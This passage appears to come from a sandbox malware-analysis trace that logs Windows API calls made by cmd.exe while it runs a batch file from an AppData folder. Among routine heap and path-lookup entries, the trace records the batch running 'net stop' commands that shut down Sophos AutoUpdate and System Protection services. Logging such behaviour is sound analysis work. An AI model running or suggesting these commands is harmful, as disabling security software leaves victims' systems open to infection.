lpDistanceToMoveHigh=0x0) returned 0x47a [0038.166] GetProcessHeap () returned 0x3e0000 [0038.166] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fbad8 [0038.166] GetProcessHeap () returned 0x3e0000 [0038.166] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fbad8 | out: hHeap=0x3e0000) returned 1 [0038.166] _tell (_FileHandle=3) returned 1146 [0038.166] _close (_FileHandle=3) returned 0 [0038.167] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0038.167] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0038.167] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0038.167] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0038.167] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0038.167] _wcsicmp (_String1="net", _String2="CD") returned 11 [0038.167] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0038.167] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0038.167] _wcsicmp (_String1="net", _String2="REN") returned -4 [0038.167] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0038.167] _wcsicmp (_String1="net", _String2="SET") returned -5 [0038.167] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0038.167] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0038.167] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0038.167] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0038.167] _wcsicmp (_String1="net", _String2="MD") returned 1 [0038.167] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0038.167] _wcsicmp (_String1="net", _String2="RD") returned -4 [0038.167] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0038.167] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0038.167] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0038.167] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0038.167] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0038.167] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0038.167] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0038.167] _wcsicmp (_String1="net", _String2="VER") returned -8 [0038.167] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0038.167] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0038.167] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0038.167] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0038.167] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0038.167] _wcsicmp (_String1="net", _String2="START") returned -5 [0038.167] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0038.167] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0038.168] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0038.168] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0038.168] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0038.168] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0038.168] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0038.168] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0038.168] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0038.168] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0038.168] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0038.168] SetErrorMode (uMode=0x0) returned 0x1 [0038.168] GetProcessHeap () returned 0x3e0000 [0038.168] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0038.168] GetProcessHeap () returned 0x3e0000 [0038.168] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0038.168] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0038.168] GetProcessHeap () returned 0x3e0000 [0038.168] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0038.168] GetProcessHeap () returned 0x3e0000 [0038.168] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0038.168] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0038.168] GetProcessHeap () returned 0x3e0000 [0038.168] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0038.168] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0038.168] GetProcessHeap () returned 0x3e0000 [0038.168] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0038.168] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0038.168] GetProcessHeap () returned 0x3e0000 [0038.168] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0038.168] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0038.168] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0038.169] GetLastError () returned 0x2 [0038.169] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0038.169] GetLastError () returned 0x2 [0038.169] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0038.169] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0038.169] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0038.169] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0038.169] GetLastError () returned 0x2 [0038.169] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0038.169] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0038.169] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0038.170] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0038.170] SetErrorMode (uMode=0x0) returned 0x1 [0038.170] GetProcessHeap () returned 0x3e0000 [0038.170] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0038.170] GetProcessHeap () returned 0x3e0000 [0038.170] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0038.170] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0038.170] GetProcessHeap () returned 0x3e0000 [0038.170] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0038.170] GetProcessHeap () returned 0x3e0000 [0038.170] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0038.170] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0038.170] GetProcessHeap () returned 0x3e0000 [0038.170] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0038.170] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0038.170] GetProcessHeap () returned 0x3e0000 [0038.170] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0038.170] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0038.170] GetProcessHeap () returned 0x3e0000 [0038.170] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0038.170] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0038.170] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0038.170] GetLastError () returned 0x2 [0038.170] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0038.171] GetLastError () returned 0x2 [0038.171] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0038.171] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0038.171] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0038.171] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0038.171] GetLastError () returned 0x2 [0038.171] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0038.171] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0038.171] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0038.171] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0038.171] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0038.171] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0038.171] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0038.171] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥ /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥ /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥ /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xb94, dwThreadId=0xb98)) returned 1 [0038.175] CloseHandle (hObject=0x74) returned 1 [0038.175] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0038.175] GetProcessHeap () returned 0x3e0000 [0038.175] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0038.175] GetEnvironmentStringsW () returned 0x3f8408* [0038.175] GetProcessHeap () returned 0x3e0000 [0038.175] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0038.182] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0038.182] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0038.362] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x1) returned 1 [0038.362] CloseHandle (hObject=0x78) returned 1 [0038.362] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000001") returned 8 [0038.362] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0038.362] GetProcessHeap () returned 0x3e0000 [0038.362] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0038.362] GetEnvironmentStringsW () returned 0x3f8408* [0038.362] GetProcessHeap () returned 0x3e0000 [0038.362] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0038.362] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0038.362] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0038.362] GetProcessHeap () returned 0x3e0000 [0038.362] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0038.362] GetEnvironmentStringsW () returned 0x3f8408* [0038.362] GetProcessHeap () returned 0x3e0000 [0038.362] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0038.363] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0038.363] GetProcessHeap () returned 0x3e0000 [0038.363] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0038.363] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0038.363] _get_osfhandle (_FileHandle=1) returned 0x264 [0038.363] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0038.363] _get_osfhandle (_FileHandle=1) returned 0x264 [0038.363] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0038.363] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0038.363] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0038.363] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0038.363] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0038.364] SetConsoleInputExeNameW () returned 0x1 [0038.364] GetConsoleOutputCP () returned 0x1b5 [0038.364] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0038.364] SetThreadUILanguage (LangId=0x0) returned 0x409 [0038.364] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0038.364] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0038.364] _get_osfhandle (_FileHandle=3) returned 0x78 [0038.364] SetFilePointer (in: hFile=0x78, lDistanceToMove=1146, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x47a [0038.364] GetProcessHeap () returned 0x3e0000 [0038.364] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0038.364] GetProcessHeap () returned 0x3e0000 [0038.364] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0038.364] GetProcessHeap () returned 0x3e0000 [0038.364] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0038.364] GetProcessHeap () returned 0x3e0000 [0038.364] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0038.364] GetProcessHeap () returned 0x3e0000 [0038.364] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fbaf0 | out: hHeap=0x3e0000) returned 1 [0038.364] GetProcessHeap () returned 0x3e0000 [0038.364] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0038.365] GetProcessHeap () returned 0x3e0000 [0038.365] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0038.365] GetProcessHeap () returned 0x3e0000 [0038.365] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0038.365] GetProcessHeap () returned 0x3e0000 [0038.365] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0038.365] GetProcessHeap () returned 0x3e0000 [0038.365] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0038.365] GetProcessHeap () returned 0x3e0000 [0038.365] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0038.365] GetProcessHeap () returned 0x3e0000 [0038.365] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0038.365] GetProcessHeap () returned 0x3e0000 [0038.365] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0038.365] _get_osfhandle (_FileHandle=3) returned 0x78 [0038.365] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x47a [0038.365] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x1447, lpOverlapped=0x0) returned 1 [0038.365] SetFilePointer (in: hFile=0x78, lDistanceToMove=1198, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4ae [0038.365] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=52, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ΓÇ£Sophos System Protection ServiceΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 52 [0038.365] _get_osfhandle (_FileHandle=3) returned 0x78 [0038.365] GetFileType (hFile=0x78) returned 0x1 [0038.365] _get_osfhandle (_FileHandle=3) returned 0x78 [0038.365] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4ae [0038.365] GetProcessHeap () returned 0x3e0000 [0038.365] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fcad8 [0038.365] GetProcessHeap () returned 0x3e0000 [0038.365] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fcad8 | out: hHeap=0x3e0000) returned 1 [0038.366] _tell (_FileHandle=3) returned 1198 [0038.366] _close (_FileHandle=3) returned 0 [0038.366] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0038.366] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0038.366] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0038.366] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0038.366] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0038.366] _wcsicmp (_String1="net", _String2="CD") returned 11 [0038.366] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0038.366] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0038.366] _wcsicmp (_String1="net", _String2="REN") returned -4 [0038.366] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0038.366] _wcsicmp (_String1="net", _String2="SET") returned -5 [0038.366] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0038.366] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0038.366] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0038.366] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0038.366] _wcsicmp (_String1="net", _String2="MD") returned 1 [0038.366] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0038.366] _wcsicmp (_String1="net", _String2="RD") returned -4 [0038.366] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0038.366] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0038.367] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0038.367] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0038.367] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0038.367] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0038.367] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0038.367] _wcsicmp (_String1="net", _String2="VER") returned -8 [0038.367] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0038.367] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0038.367] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0038.367] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0038.367] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0038.367] _wcsicmp (_String1="net", _String2="START") returned -5 [0038.367] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0038.367] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0038.367] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0038.367] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0038.367] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0038.367] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0038.367] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0038.367] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0038.367] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0038.367] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0038.367] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0038.367] SetErrorMode (uMode=0x0) returned 0x1 [0038.367] GetProcessHeap () returned 0x3e0000 [0038.367] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0038.367] GetProcessHeap () returned 0x3e0000 [0038.367] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0038.367] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0038.367] GetProcessHeap () returned 0x3e0000 [0038.367] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0038.367] GetProcessHeap () returned 0x3e0000 [0038.368] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0038.368] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0038.368] GetProcessHeap () returned 0x3e0000 [0038.368] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0038.368] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0038.368] GetProcessHeap () returned 0x3e0000 [0038.368] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0038.368] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0038.368] GetProcessHeap () returned 0x3e0000 [0038.368] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0038.368] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0038.368] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0038.368] GetLastError () returned 0x2 [0038.368] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0038.368] GetLastError () returned 0x2 [0038.368] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0038.368] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0038.368] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0038.368] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0038.369] GetLastError () returned 0x2 [0038.369] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0038.369] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0038.369] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0038.369] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", 